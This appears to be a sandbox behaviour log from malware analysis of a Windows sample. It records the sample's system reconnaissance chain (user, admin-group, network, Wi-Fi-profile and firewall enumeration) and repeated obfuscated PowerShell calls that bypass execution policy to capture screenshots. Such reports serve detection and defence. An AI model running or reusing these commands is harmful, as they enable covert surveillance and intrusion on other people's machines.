Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /svc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc query type= service state= all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show config
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\System32\query.exe Process created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B89570 cpuid 0_2_00007FF7B2B89570
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\attrs-24.2.0.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\attrs-24.2.0.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info\license_files VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info\license_files VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformation Jump to behavior
